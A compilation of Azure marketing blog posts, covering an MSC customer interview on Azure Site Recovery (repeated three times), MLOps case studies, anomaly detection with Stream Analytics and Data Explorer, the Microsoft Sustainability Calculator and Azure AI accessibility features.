MSC Mediterranean Shipping Company on Azure Site Recovery

Today’s Q&A post covers an interview between Siddharth Deekshit, Program Manager, Microsoft Azure Site Recovery engineering and Quentin Drion, IT Director of Infrastructure and Operations, MSC. MSC is a global shipping and logistics business, our conversation focused on their organization’s journey with Azure Site Recovery (ASR). To learn more about achieving resilience in Azure, refer to this whitepaper.

I wanted to start by understanding the transformation journey that MSC is going through, including consolidating on Azure. Can you talk about how Azure is helping you run your business today?

We are a shipping line, so we move containers worldwide. Over the years, we have developed our own software to manage our core business. We have a different set of software for small, medium, and large entities, which were running on-premises. That meant we had to maintain a lot of on-premises resources to support all these business applications. A decision was taken a few years ago to consolidate all these business workloads inside Azure regardless of the size of the entity. When we are migrating, we turn off what we have on-premises and then start using software hosted in Azure and provide it as a service for our subsidiaries. This new design is managed in a centralized manner by an internal IT team.

That’s fantastic. Consolidation is a big benefit of using Azure. Apart from that, what other benefits do you see of moving to Azure?

For us, automation is a big one that is a huge improvement, the capabilities in terms of API in the integration and automation that we can have with Azure allows us to deploy environments in a matter of hours where before that it took much, much longer as we had to order the hardware, set it up, and then configure. Now we no longer need to worry about the set up as well as hardware support, and warranties. The environment is all virtualized and we can, of course, provide the same level of recovery point objective (RPO), recovery time objective (RTO), and security to all the entities that we have worldwide.

Speaking of RTO and RPO, let’s talk a little bit about Site Recovery. Can you tell me what life was like before using Site Recovery?

Actually, when we started migrating workloads, we had a much more traditional approach, in the sense that we were doing primary production workloads in one Azure region, and we were setting up and managing a complete disaster recovery infrastructure in another region. So the traditional on-premises data center approach was really how we started with disaster recovery (DR) on Azure, but then we spent the time to study what Site Recovery could provide us. Based on the findings and some testing that we performed, we decided to change the implementation that we had in place for two to three years and switch to Site Recovery, ultimately to reduce our cost significantly, since we no longer have to keep our DR Azure Virtual Machines running in another region. In terms of management, it's also easier for us. For traditional workloads, we have better RPO and RTO than we saw with our previous approach. So we’ve seen great benefits across the board.

That’s great to know. What were you most skeptical about when it came to using Site Recovery? You mentioned that your team ran tests, so what convinced you that Site Recovery was the right choice?

It was really based on the tests that we did. Earlier, we were doing a lot of manual work to switch to the DR region, to ensure that domain name system (DNS) settings and other networking settings were appropriate, so there were a lot of constraints. When we tested it compared to this manual way of doing things, Site Recovery worked like magic. The fact that our primary region could fail and that didn’t require us to do a lot was amazing. Our applications could start again in the DR region and we just had to manage the upper layer of the app to ensure that it started correctly. We were cautious about this app restart, not because of the Virtual Machine(s), because we were confident that Site Recovery would work, but because of our database engine. We were positively surprised to see how well Site Recovery works. All our teams were very happy about the solution and they are seeing the added value of moving to this kind of technology for them as operational teams, but also for us in management to be able to save money, because we reduced the number of Virtual Machines that we had that were actually not being used.

Can you talk to me a little bit about your onboarding experience with Site Recovery?

I think we had six or seven major in house developed applications in Azure at that time. We picked one of these applications as a candidate for testing. The test was successful. We then extended to a different set of applications that were in production. There were again no major issues. The only drawback we had was with some large disks. Initially, some of our larger disks were not supported. This was solved quickly and since then it has been, I would say, really straightforward. Based on the success of our testing, we worked to switch all the applications we have on the platform to use Site Recovery for disaster recovery.

Can you give me a sense of what workloads you are running on your Azure Virtual Machines today? How many people leverage the applications running on those Virtual Machines for their day job?

So it's really core business apps. There is, of course, the main infrastructure underneath, but what we serve is business applications that we have written internally, presented to Citrix frontend in Azure. These applications do container bookings, customer registrations, etc. I mean, we have different workloads associated with the complete process of shipping. In terms of users, we have some applications that are being used by more than 5,000 people, and more and more it’s becoming their primary day-to-day application.

Wow, that’s a ton of usage and I’m glad you trust Site Recovery for your DR needs. Can you tell me a little bit about the architecture of those workloads?

Most of them are Windows-based workloads. The software that gets the most used worldwide is a 3-tier application. We have a database on SQL, a middle-tier server, application server, and also some web frontend servers. But for the new one that we have developed now, it's based on microservices. There are also some Linux servers being used for specific usage.

Tell me more about your experience with Linux.

Site Recovery works like a charm with Linux workloads. We only had a few mistakes in the beginning, made on our side. We wanted to use a product from Red Hat called Satellite for updates, but we did not realize that we cannot change the way that the Virtual Machines are being managed if you want to use Satellite. It needs to be defined at the beginning otherwise it's too late. But besides this, the ‘bring your own license’ story works very well and especially with Site Recovery.

Glad to hear that you found it to be a seamless experience. Was there any other aspect of Site Recovery that impressed you, or that you think other organizations should know about?

For me, it's the capability to be able to perform drills in an easy way. With the more traditional approach, each time that you want to do a complete disaster recovery test, it's always time and resource-consuming in terms of preparation. With Site Recovery, we did a test a few weeks back on the complete environment and it was really easy to prepare. It was fast to do the switch to the recovery region, and just as easy to bring back the workload to the primary region. So, I mean for me today, it's really the ease of using Site Recovery.

If you had to do it all over again, what would you do differently on your Site Recovery Journey?

I would start to use it earlier. If we hadn’t gone with the traditional active-passive approach, I think we could have saved time and money for the company. On the other hand, we were in this way confident in the journey. Other than that, I think we wouldn’t have changed much. But what we want to do now, is start looking at Azure Site Recovery services to be able to replicate workloads running on on-premises Virtual Machines in Hyper-V. For those applications that are still not migrated to Azure, we want to at least ensure proper disaster recovery. We also want to replicate some VMware Virtual Machines that we still have as part of our migration journey to Hyper-V. This is what we are looking at.

Do you have any advice for folks for other prospective or current customers of Site Recovery?

One piece of advice that I could share is to suggest starting sooner and if required, smaller. Start using Site Recovery even if it's on one small app. It will help you see the added value, and that will help you convince the operational teams that there is a lot of value and that they can trust the services that Site Recovery is providing instead of trying to do everything on their own.

That’s excellent advice. Those were all my questions, Quentin. Thanks for sharing your experiences.

Learn more about resilience with Azure. 
Quelle: Azure

Mediterranean Shipping Company on Azure Site Recovery

Today’s Q&A post covers an interview between Siddharth Deekshit, Program Manager, Microsoft Azure Site Recovery engineering and Quentin Drion, IT Director of Infrastructure and Operations, MSC. MSC is a global shipping and logistics business, our conversation focused on their organization’s journey with Azure Site Recovery (ASR). To learn more about achieving resilience in Azure, refer to this whitepaper.

I wanted to start by understanding the transformation journey that MSC is going through, including consolidating on Azure. Can you talk about how Azure is helping you run your business today?

We are a shipping line, so we move containers worldwide. Over the years, we have developed our own software to manage our core business. We have a different set of software for small, medium, and large entities, which were running on-premises. That meant we had to maintain a lot of on-premises resources to support all these business applications. A decision was taken a few years ago to consolidate all these business workloads inside Azure regardless of the size of the entity. When we are migrating, we turn off what we have on-premises and then start using software hosted in Azure and provide it as a service for our subsidiaries. This new design is managed in a centralized manner by an internal IT team.

That’s fantastic. Consolidation is a big benefit of using Azure. Apart from that, what other benefits do you see of moving to Azure?

For us, automation is a big one that is a huge improvement, the capabilities in terms of API in the integration and automation that we can have with Azure allows us to deploy environments in a matter of hours where before that it took much, much longer as we had to order the hardware, set it up, and then configure. Now we no longer need to worry about the set up as well as hardware support, and warranties. The environment is all virtualized and we can, of course, provide the same level of recovery point objective (RPO), recovery time objective (RTO), and security to all the entities that we have worldwide.

Speaking of RTO and RPO, let’s talk a little bit about Site Recovery. Can you tell me what life was like before using Site Recovery?

Actually, when we started migrating workloads, we had a much more traditional approach, in the sense that we were doing primary production workloads in one Azure region, and we were setting up and managing a complete disaster recovery infrastructure in another region. So the traditional on-premises data center approach was really how we started with disaster recovery (DR) on Azure, but then we spent the time to study what Site Recovery could provide us. Based on the findings and some testing that we performed, we decided to change the implementation that we had in place for two to three years and switch to Site Recovery, ultimately to reduce our cost significantly, since we no longer have to keep our DR Azure Virtual Machines running in another region. In terms of management, it's also easier for us. For traditional workloads, we have better RPO and RTO than we saw with our previous approach. So we’ve seen great benefits across the board.

That’s great to know. What were you most skeptical about when it came to using Site Recovery? You mentioned that your team ran tests, so what convinced you that Site Recovery was the right choice?

It was really based on the tests that we did. Earlier, we were doing a lot of manual work to switch to the DR region, to ensure that domain name system (DNS) settings and other networking settings were appropriate, so there were a lot of constraints. When we tested it compared to this manual way of doing things, Site Recovery worked like magic. The fact that our primary region could fail and that didn’t require us to do a lot was amazing. Our applications could start again in the DR region and we just had to manage the upper layer of the app to ensure that it started correctly. We were cautious about this app restart, not because of the Virtual Machine(s), because we were confident that Site Recovery would work, but because of our database engine. We were positively surprised to see how well Site Recovery works. All our teams were very happy about the solution and they are seeing the added value of moving to this kind of technology for them as operational teams, but also for us in management to be able to save money, because we reduced the number of Virtual Machines that we had that were actually not being used.

Can you talk to me a little bit about your onboarding experience with Site Recovery?

I think we had six or seven major in house developed applications in Azure at that time. We picked one of these applications as a candidate for testing. The test was successful. We then extended to a different set of applications that were in production. There were again no major issues. The only drawback we had was with some large disks. Initially, some of our larger disks were not supported. This was solved quickly and since then it has been, I would say, really straightforward. Based on the success of our testing, we worked to switch all the applications we have on the platform to use Site Recovery for disaster recovery.

Can you give me a sense of what workloads you are running on your Azure Virtual Machines today? How many people leverage the applications running on those Virtual Machines for their day job?

So it's really core business apps. There is, of course, the main infrastructure underneath, but what we serve is business applications that we have written internally, presented to Citrix frontend in Azure. These applications do container bookings, customer registrations, etc. I mean, we have different workloads associated with the complete process of shipping. In terms of users, we have some applications that are being used by more than 5,000 people, and more and more it’s becoming their primary day-to-day application.

Wow, that’s a ton of usage and I’m glad you trust Site Recovery for your DR needs. Can you tell me a little bit about the architecture of those workloads?

Most of them are Windows-based workloads. The software that gets the most used worldwide is a 3-tier application. We have a database on SQL, a middle-tier server, application server, and also some web frontend servers. But for the new one that we have developed now, it's based on microservices. There are also some Linux servers being used for specific usage.

Tell me more about your experience with Linux.

Site Recovery works like a charm with Linux workloads. We only had a few mistakes in the beginning, made on our side. We wanted to use a product from Red Hat called Satellite for updates, but we did not realize that we cannot change the way that the Virtual Machines are being managed if you want to use Satellite. It needs to be defined at the beginning otherwise it's too late. But besides this, the ‘bring your own license’ story works very well and especially with Site Recovery.

Glad to hear that you found it to be a seamless experience. Was there any other aspect of Site Recovery that impressed you, or that you think other organizations should know about?

For me, it's the capability to be able to perform drills in an easy way. With the more traditional approach, each time that you want to do a complete disaster recovery test, it's always time and resource-consuming in terms of preparation. With Site Recovery, we did a test a few weeks back on the complete environment and it was really easy to prepare. It was fast to do the switch to the recovery region, and just as easy to bring back the workload to the primary region. So, I mean for me today, it's really the ease of using Site Recovery.

If you had to do it all over again, what would you do differently on your Site Recovery Journey?

I would start to use it earlier. If we hadn’t gone with the traditional active-passive approach, I think we could have saved time and money for the company. On the other hand, we were in this way confident in the journey. Other than that, I think we wouldn’t have changed much. But what we want to do now, is start looking at Azure Site Recovery services to be able to replicate workloads running on on-premises Virtual Machines in Hyper-V. For those applications that are still not migrated to Azure, we want to at least ensure proper disaster recovery. We also want to replicate some VMware Virtual Machines that we still have as part of our migration journey to Hyper-V. This is what we are looking at.

Do you have any advice for folks for other prospective or current customers of Site Recovery?

One piece of advice that I could share is to suggest starting sooner and if required, smaller. Start using Site Recovery even if it's on one small app. It will help you see the added value, and that will help you convince the operational teams that there is a lot of value and that they can trust the services that Site Recovery is providing instead of trying to do everything on their own.

That’s excellent advice. Those were all my questions, Quentin. Thanks for sharing your experiences.

Learn more about resilience with Azure. 
Quelle: Azure

MSC Mediterranean Shipping Company on Azure Site Recovery, “ASR worked like magic”

Today’s Q&A post covers an interview between Siddharth Deekshit, Program Manager, Microsoft Azure Site Recovery engineering and Quentin Drion, IT Director of Infrastructure and Operations, MSC. MSC is a global shipping and logistics business, our conversation focused on their organization’s journey with Azure Site Recovery (ASR). To learn more about achieving resilience in Azure, refer to this whitepaper.

I wanted to start by understanding the transformation journey that MSC is going through, including consolidating on Azure. Can you talk about how Azure is helping you run your business today?

We are a shipping line, so we move containers worldwide. Over the years, we have developed our own software to manage our core business. We have a different set of software for small, medium, and large entities, which were running on-premises. That meant we had to maintain a lot of on-premises resources to support all these business applications. A decision was taken a few years ago to consolidate all these business workloads inside Azure regardless of the size of the entity. When we are migrating, we turn off what we have on-premises and then start using software hosted in Azure and provide it as a service for our subsidiaries. This new design is managed in a centralized manner by an internal IT team.

That’s fantastic. Consolidation is a big benefit of using Azure. Apart from that, what other benefits do you see of moving to Azure?

For us, automation is a big one that is a huge improvement, the capabilities in terms of API in the integration and automation that we can have with Azure allows us to deploy environments in a matter of hours where before that it took much, much longer as we had to order the hardware, set it up, and then configure. Now we no longer need to worry about the set up as well as hardware support, and warranties. The environment is all virtualized and we can, of course, provide the same level of recovery point objective (RPO), recovery time objective (RTO), and security to all the entities that we have worldwide.

Speaking of RTO and RPO, let’s talk a little bit about Site Recovery. Can you tell me what life was like before using Site Recovery?

Actually, when we started migrating workloads, we had a much more traditional approach, in the sense that we were doing primary production workloads in one Azure region, and we were setting up and managing a complete disaster recovery infrastructure in another region. So the traditional on-premises data center approach was really how we started with disaster recovery (DR) on Azure, but then we spent the time to study what Site Recovery could provide us. Based on the findings and some testing that we performed, we decided to change the implementation that we had in place for two to three years and switch to Site Recovery, ultimately to reduce our cost significantly, since we no longer have to keep our DR Azure Virtual Machines running in another region. In terms of management, it's also easier for us. For traditional workloads, we have better RPO and RTO than we saw with our previous approach. So we’ve seen great benefits across the board.

That’s great to know. What were you most skeptical about when it came to using Site Recovery? You mentioned that your team ran tests, so what convinced you that Site Recovery was the right choice?

It was really based on the tests that we did. Earlier, we were doing a lot of manual work to switch to the DR region, to ensure that domain name system (DNS) settings and other networking settings were appropriate, so there were a lot of constraints. When we tested it compared to this manual way of doing things, Site Recovery worked like magic. The fact that our primary region could fail and that didn’t require us to do a lot was amazing. Our applications could start again in the DR region and we just had to manage the upper layer of the app to ensure that it started correctly. We were cautious about this app restart, not because of the Virtual Machine(s), because we were confident that Site Recovery would work, but because of our database engine. We were positively surprised to see how well Site Recovery works. All our teams were very happy about the solution and they are seeing the added value of moving to this kind of technology for them as operational teams, but also for us in management to be able to save money, because we reduced the number of Virtual Machines that we had that were actually not being used.

Can you talk to me a little bit about your onboarding experience with Site Recovery?

I think we had six or seven major in house developed applications in Azure at that time. We picked one of these applications as a candidate for testing. The test was successful. We then extended to a different set of applications that were in production. There were again no major issues. The only drawback we had was with some large disks. Initially, some of our larger disks were not supported. This was solved quickly and since then it has been, I would say, really straightforward. Based on the success of our testing, we worked to switch all the applications we have on the platform to use Site Recovery for disaster recovery.

Can you give me a sense of what workloads you are running on your Azure Virtual Machines today? How many people leverage the applications running on those Virtual Machines for their day job?

So it's really core business apps. There is, of course, the main infrastructure underneath, but what we serve is business applications that we have written internally, presented to Citrix frontend in Azure. These applications do container bookings, customer registrations, etc. I mean, we have different workloads associated with the complete process of shipping. In terms of users, we have some applications that are being used by more than 5,000 people, and more and more it’s becoming their primary day-to-day application.

Wow, that’s a ton of usage and I’m glad you trust Site Recovery for your DR needs. Can you tell me a little bit about the architecture of those workloads?

Most of them are Windows-based workloads. The software that gets the most used worldwide is a 3-tier application. We have a database on SQL, a middle-tier server, application server, and also some web frontend servers. But for the new one that we have developed now, it's based on microservices. There are also some Linux servers being used for specific usage.

Tell me more about your experience with Linux.

Site Recovery works like a charm with Linux workloads. We only had a few mistakes in the beginning, made on our side. We wanted to use a product from Red Hat called Satellite for updates, but we did not realize that we cannot change the way that the Virtual Machines are being managed if you want to use Satellite. It needs to be defined at the beginning otherwise it's too late. But besides this, the ‘bring your own license’ story works very well and especially with Site Recovery.

Glad to hear that you found it to be a seamless experience. Was there any other aspect of Site Recovery that impressed you, or that you think other organizations should know about?

For me, it's the capability to be able to perform drills in an easy way. With the more traditional approach, each time that you want to do a complete disaster recovery test, it's always time and resource-consuming in terms of preparation. With Site Recovery, we did a test a few weeks back on the complete environment and it was really easy to prepare. It was fast to do the switch to the recovery region, and just as easy to bring back the workload to the primary region. So, I mean for me today, it's really the ease of using Site Recovery.

If you had to do it all over again, what would you do differently on your Site Recovery Journey?

I would start to use it earlier. If we hadn’t gone with the traditional active-passive approach, I think we could have saved time and money for the company. On the other hand, we were in this way confident in the journey. Other than that, I think we wouldn’t have changed much. But what we want to do now, is start looking at Azure Site Recovery services to be able to replicate workloads running on on-premises Virtual Machines in Hyper-V. For those applications that are still not migrated to Azure, we want to at least ensure proper disaster recovery. We also want to replicate some VMware Virtual Machines that we still have as part of our migration journey to Hyper-V. This is what we are looking at.

Do you have any advice for folks for other prospective or current customers of Site Recovery?

One piece of advice that I could share is to suggest starting sooner and if required, smaller. Start using Site Recovery even if it's on one small app. It will help you see the added value, and that will help you convince the operational teams that there is a lot of value and that they can trust the services that Site Recovery is providing instead of trying to do everything on their own.

That’s excellent advice. Those were all my questions, Quentin. Thanks for sharing your experiences.

Learn more about resilience with Azure. 
Quelle: Azure

MLOps—the path to building a competitive edge

Enterprises today are transforming their businesses using Machine Learning (ML) to develop a lasting competitive advantage. From healthcare to transportation, supply chain to risk management, machine learning is becoming pervasive across industries, disrupting markets and reshaping business models.

Organizations need the technology and tools required to build and deploy successful Machine Learning models and operate in an agile way. MLOps is the key to making machine learning projects successful at scale. What is MLOps ? It is the practice of collaboration between data science and IT teams designed to accelerate the entire machine lifecycle across model development, deployment, monitoring, and more. Microsoft Azure Machine Learning enables companies to fully embrace MLOps practices will and truly be able to realize the potential of AI in their business.

One great example of a customer transforming their business with Machine Learning and MLOps is TransLink. They support Metro Vancouver's transportation network, serving 400 million total boarding’s from residents and visitors as of 2018. With an extensive bus system spanning 1,800 sq. kilometers, TransLink customers depend heavily on accurate bus departure times to plan their journeys.

To enhance customer experience, TransLink deployed 18,000 different sets of Machine Learning models to better predict bus departure times that incorporate factors like traffic, bad weather, and other schedule disruptions. Using MLOps with Azure Machine Learning they were able to manage and deliver the models at scale.

“With MLOps in Azure Machine Learning, TransLink has moved all models to production and improved predictions by 74 percent, so customers can better plan their journey on TransLink's network. This has resulted in a 50 percent reduction on average in customer wait times at stops.”–Sze-Wan Ng, Director of Analytics & Development, TransLink.

Johnson Controls is another customer using Machine Learning Operations at scale. For over 130 years, they have produced fire, HVAC and security equipment for buildings. Johnson Controls is now in the middle of a smart city revolution, with Machine Learning being a central aspect of their equipment maintenance approach.

Johnson Controls runs thousands of chillers with 70 different types of sensors each, streaming terabytes of data. MLOps helped put models into production in a timely fashion, with a repeatable process, to deliver real-time insights on maintenance routines. As a result, chiller shutdowns could be predicted days in advance and mitigated effectively, delivering cost savings and increasing customer satisfaction.

“Using the MLOps capabilities in Azure Machine Learning, we were able to decrease both mean time to repair and unplanned downtime by over 66 percent, resulting in substantial business gains.”–Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls

Getting started with MLOps

To take full advantage of MLOps, organizations need to apply the same rigor and processes of other software development projects.

To help organizations with their machine learning journey, GigaOm developed the MLOps vision report that includes best practices for effective implementation and a maturity model.

Maturity is measured through five levels of development across key categories such as strategy, architecture, modeling, processes, and governance. Using the maturity model, enterprises can understand where they are and determine what steps to take to ‘level up’ and achieve business objectives.

 

 

“Organizations can address the challenges of developing AI solutions by applying MLOps and implementing best practices. The report and MLOps maturity model from GigaOm can be a very valuable tool in this journey,”– Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls.

To learn more, read the GigaOm report and make machine learning transformation a reality for your business.

More information

Learn more about Azure Machine Learning

Read the GigaOm report, Delivering on the Vision of MLOps

Try Azure Machine Learning for free today.

Quelle: Azure

Azure Data Explorer and Stream Analytics for anomaly detection

Anomaly detection plays a vital role in many industries across the globe, such as fraud detection for the financial industry, health monitoring in hospitals, fault detection and operating environment monitoring in the manufacturing, oil and gas, utility, transportation, aviation, and automotive industries.

Anomaly detection is about finding patterns in data that do not conform to expected behavior. It is important for decision-makers to be able to detect them and take proactive actions if needed. Using the oil and gas industry as one example, deep-water rigs with various equipment are intensively monitored by hundreds of sensors that send measurements in various frequencies and formats. Analysis or visualization is hard using traditional software platforms, and any non-productive time on deep-water oil rig platforms caused by the failure to detect anomaly could mean large financial losses each day.

Companies need new technologies like Azure IoT, Azure Stream Analytics, Azure Data Explorer and machine learning to ingest, processes, and transform data into strategic business intelligence to enhance exploration and production, improve manufacturing efficiency, and ensure safety and environmental protection. These managed services also help customers dramatically reduce software development time, accelerate time to market, provide cost-effectiveness, and achieve high availability and scalability.

While the Azure platform provides lots of options for anomaly detection and customers can choose the technology that best suits their needs, customers also brought questions to field facing architects on what use cases are most suitable for each solution. We’ll examine the answers to these questions below, but first, you’ll need to know a couple definitions:

What is a time series? A time series is a series of data points indexed in time order. In the oil and gas industry, most equipment or sensor readings are sequences taken at successive points in time or depth.

What is decomposition of additive time series? Decomposition is the task to separate a time series into components as shown on the graph below.

Time-series forecasting and anomaly detection

Anomaly detection is the process to identify observations that are different significantly from majority of the datasets.

This is an anomaly detection example with Azure Data Explorer.

The red line is the original time series.
The blue line is the baseline (seasonal + trend) component.
The purple points are anomalous points on top of the original time series.

To detect anomalies, either Azure Stream Analytics or Azure Data Explorer can be used for real-time analytics and detection as illustrated in the diagram below.

Azure Stream Analytics is an easy-to-use, real-time analytics service that is designed for mission-critical workloads. You can build an end-to-end serverless streaming pipeline with just a few clicks, go from zero to production in minutes using SQL, or extend it with custom code and built-in machine learning capabilities for more advanced scenarios.

Azure Data Explorer is a fast, fully managed data analytics service for near real-time analysis on large volumes of data streaming from applications, websites, IoT devices, and more. You can ask questions and iteratively explore data on the fly to improve products, enhance customer experiences, monitor devices, boost operations, and quickly identify patterns, anomalies, and trends in your data.

Azure Stream Analytics or Azure Data Explorer?

Use Case

Stream Analytics is for continuous or streaming real-time analytics, with aggregate functions support hopping, sliding, tumbling, or session windows. It will not suit your use case if you want to write UDFs or UDAs in languages other than JavaScript or C#, or if  your solution is in a multi-cloud or on-premises environment.

Data Explorer is for on-demand or interactive near real-time analytics, data exploration on large volumes of data streams, seasonality decomposition, ad hoc work, dashboards, and root cause analyses on data from near real-time to historical. It will not suit you use case if you need to deploy analytics onto the edge.

Forecasting

You can set up a Stream Analytics job that integrates with Azure Machine Learning Studio.

Data Explorer provides native function for forecasting time series based on the same decomposition model. Forecasting is useful for many scenarios like preventive maintenance, resource planning, and more.

Seasonality

Stream Analytics does not provide seasonality support, with the limitation of sliding windows size.

Data Explorer provides functionalities to automatically detect the periods in the time series or allows you to verify that a metric should have specific distinct period(s) if you know them.

Decomposition

Stream Analytics does not support decomposition.

Data Explorer provides function which takes a set of time series and automatically decomposes each time series to its seasonal, trend, residual, and baseline components.

Filtering and Analysis

Stream Analytics provides functions to detect spikes and dips or change points.

Data Explorer provides analysis to finds anomalous points on a set of time series, and a root cause analysis (RCA) function after anomaly is detected.

Filtering

Stream Analytics provides a filter with reference data, slow-moving, or static.

Data Explorer provides two generic functions:
•    Finite impulse response (FIR) which can be used for moving average, differentiation, shape matching
•    Infinite impulse response (IIR) for exponential smoothing and cumulative sum

Anomaly Detection

Stream Analytics provides detections for:
•    Spikes and dips (temporary anomalies)
•    Change points (persistent anomalies such as level or trend change)

Data Explorer provides detections for:
•    Spikes & dips, based on enhanced seasonal decomposition model (supporting automatic seasonality detection, robustness to anomalies in the training data)
•    Changepoint (level shift, trend change) by segmented linear regression
•    KQL Inline Python/R plugins enable extensibility with other models implemented in Python or R

What's next?

Azure Data Analytics, in general, brings you the best of breed technologies for each workload. The new Real-Time Analytics architecture (shown above) allows leveraging the best technology for each type of workload for stream and time-series analytics including anomaly detection. The following is a list of resources that may help you get started quickly:

If you haven't already, check out this GitHub repository for Anomaly detection in Azure Stream Analytics

Check out his GitHub repository for Anomaly detection and forecasting in Azure Data Explorer, and Time series analysis in Azure Data Explorer. 

Anomaly detection in Azure Stream Analytics Overview

Anomaly detection and forecasting in Azure Data Explorer Overview

Documentation on Time series analysis in Azure Data Explorer and this blog

Documentation on Kusto query language and Time Series Analysis 

Quelle: Azure

Microsoft Sustainability Calculator helps enterprises analyze the carbon emissions of their IT infrastructure

For more than a decade, Microsoft has been investing to reduce environmental impact while supporting the digital transformation of organizations around the world through cloud services. We strive to be transparent with our commitments, evidenced by our announcement that Microsoft’s cloud datacenters will be powered by 100 percent renewable energy sources by 2025. The commitments and investments we make as a company are important steps in reducing our own environmental impact, but we recognize that the opportunity for positive change is greatest by empowering customers and partners to achieve their own sustainability goals.

An industry first—the Microsoft Sustainability Calculator

Today we’re announcing the availability of the Microsoft Sustainability Calculator, a Power BI application for Azure enterprise customers that provides new insight into carbon emissions data associated with their Azure services. Migrating from traditional datacenters to cloud services significantly improves efficiencies, however, enterprises are now looking for additional insights into the carbon impact of their cloud workloads to help them make more sustainable computing decisions. For the first time, those responsible for reporting on and driving sustainability within their organizations will have the ability to quantify the carbon impact of each Azure subscription over a period of time and datacenter region, as well as see estimated carbon savings from running those workloads in Azure versus on-premises datacenters. This data is crucial for reporting existing emissions and is the first step in establishing a foundation to drive further decarbonization efforts.

Providing transparency with rigorous methodology

The tool’s calculations are based on a customer’s Azure consumption, informed by the research in the 2018 whitepaper, “The Carbon Benefits of Cloud Computing: a Study of the Microsoft Cloud”, and have been independently verified by Apex, a leading environmental verification body. The calculator factors in inputs such as the energy requirements of the Azure service, the energy mix of the electric grid serving the hosting datacenters, Microsoft’s procurement of renewable energy in those datacenters, as well as the emissions associated with the transfer of data over the internet. The result is an estimate of the greenhouse gas (GHG) emissions, measured in total metric tons of carbon equivalent (MTCO2e) related to a customer’s consumption of Azure.

The calculator gives a granular view of the estimated emissions savings from running workloads on Azure by accounting for Microsoft’s IT operational efficiency, IT equipment efficiency, and datacenter infrastructure efficiency compared to that of a typical on-premises deployment. It also estimates the emissions savings attributable to a customer from Microsoft’s purchase of renewable energy.
  

We also understand customers want transparency into the specific commitments we are making to build a more sustainable cloud. To make that information easily accessible, we’ve built a view within the tool of the renewable energy projects that Microsoft has invested in as part of its carbon neutral and renewable energy commitments. Each year Microsoft purchases renewable energy to cover its annual cloud consumption. Customers can use the world map to learn about projects in regions where they consume Azure services or have a regional presence. The projects are examples of the investments that Microsoft has made since 2012.

A path to actionable insight

Azure enterprise customers can get started by downloading the Microsoft Sustainability Calculator from AppSource now and following the included setup instructions. We’re excited by the opportunity this new tool provides for our customers to gain a deeper understanding of their current infrastructure and drive meaningful sustainability conversations within their organizations. We see this as a first step and plan to deepen and expand the tool’s capabilities in the future. We know our customers would like an even more comprehensive view of the sustainability benefits of our cloud services and look forward to supporting and enabling them in their journey.
Quelle: Azure

Creating a more accessible world with Azure AI

At Microsoft, we are inspired by how artificial intelligence is transforming organizations of all sizes, empowering them to reimagine what’s possible. AI has immense potential to unlock solutions to some of society’s most pressing challenges.

One challenge is that according to the World Health Association, globally, only 1 in 10 people with a disability have access to assistive technologies and products. We believe that AI solutions can have a profound impact on this community. To meet this need, we aim to democratize AI to make it easier for every developer to build accessibility into their apps and services, across language, speech, and vision.

In view of the upcoming Bett Show in London, we’re shining a light on how Immersive Reader enhances reading comprehension for people regardless of their age or ability, and we’re excited to share how Azure AI is broadly enabling developers to build accessible applications that empower everyone.

Empowering readers of all abilities

Immersive Reader is an Azure Cognitive Service that helps users of any age and reading ability with features like reading aloud, translating languages, and focusing attention through highlighting and other design elements. Millions of educators and students already use Immersive Reader to overcome reading and language barriers.

The Young Women’s Leadership School of Astoria, New York, brings together an incredible diversity of students with different backgrounds and learning styles. The teachers at The Young Women’s Leadership School support many types of learners, including students who struggle with text comprehension due to learning differences, or language learners who may not understand the primary language of the classroom. The school wanted to empower all students, regardless of their background or learning styles, to grow their confidence and love for reading and writing.

Watch the story here. 

Teachers at The Young Women’s Leadership School turned to Immersive Reader and an Azure AI partner, Buncee, as they looked for ways to create a more inclusive and engaging classroom. Buncee enables students and teachers to create and share interactive multimedia projects. With the integration of Immersive Reader, students who are dyslexic can benefit from features that help focus attention in their Buncee presentations, while those who are just learning the English language can have content translated to them in their native language.

Like Buncee, companies including Canvas, Wakelet, ThingLink, and Nearpod are also making content more accessible with Immersive Reader integration. To see the entire list of partners, visit our Immersive Reader Partners page. Discover how you can start embedding Immersive Reader into your apps today. To learn more about how Immersive Reader and other accessibility tools are fostering inclusive classrooms, visit our EDU blog.

Breaking communication barriers

Azure AI is also making conversations, lectures, and meetings more accessible to people who are deaf or hard of hearing. By enabling conversations to be transcribed and translated in real-time, individuals can follow and fully engage with presentations.

The Balavidyalaya School in Chennai, Tamil Nadu, India teaches speech and language skills to young children who are deaf or hard of hearing. The school recently held an international conference with hundreds of alumni, students, faculty, and parents. With live captioning and translation powered by Azure AI, attendees were able to follow conversations in their native languages, while the presentations were given in English.

Learn how you can easily integrate multi-language support into your own apps with Speech Translation, and see the technology in action with Translator, with support for more than 60 languages, today.

Engaging learners in new ways

We recently announced the Custom Neural Voice capability of Text to Speech, which enables customers to build a unique voice, starting from just a few minutes of training audio.

The Beijing Hongdandan Visually Impaired Service Center leads the way in applying this technology to empower users in incredible ways. Hongdandan produces educational audiobooks featuring the voice of Lina, China’s first blind broadcaster, using Custom Neural Voice. While creating audiobooks can be a time-consuming process, Custom Neural Voice allows Lina to produce high-quality audiobooks at scale, enabling Hongdandan to support over 105 schools for the blind in China like never before.

“We were amazed by how quickly Azure AI could reproduce Lina's voice in such a natural-sounding way with her speech data, enabling us to create educational audiobooks much more quickly. We were also highly impressed by Microsoft's commitment to protecting Lina's voice and identity."—Xin Zeng, Executive Director at Hongdandan

Learn how you can give your apps a new voice with Text to Speech.

Making the world visible for everyone

According to the International Agency for the Prevention of Blindness, more than 250 million people are blind or have low vision across the globe. Last month, in celebration of the United Nations International Day of Persons with Disabilities, Seeing AI, a free iOS app that describes nearby people, text, and objects, expanded support to five new languages. The additional language support for Spanish, Japanese, German, French, and Dutch makes it possible for millions of blind or low vision individuals to read documents, engage with people around them, hear descriptions of their surroundings in their native language, and much more. All of this is made possible with Azure AI.

Try Seeing AI today or extend vision capabilities to your own apps using Computer Vision and Custom Vision.

Get involved

We are humbled and inspired by what individuals and organizations are accomplishing today with Azure AI technologies. We can’t wait to see how you will continue to build on these technologies to unlock new possibilities and design more accessible experiences. Get started today with a free trial.

Check out our AI for Accessibility program to learn more about how companies are harnessing the power of AI to amplify capabilities for the millions of people around the world with a disability.
Quelle: Azure

New Azure blueprint for CIS Benchmark

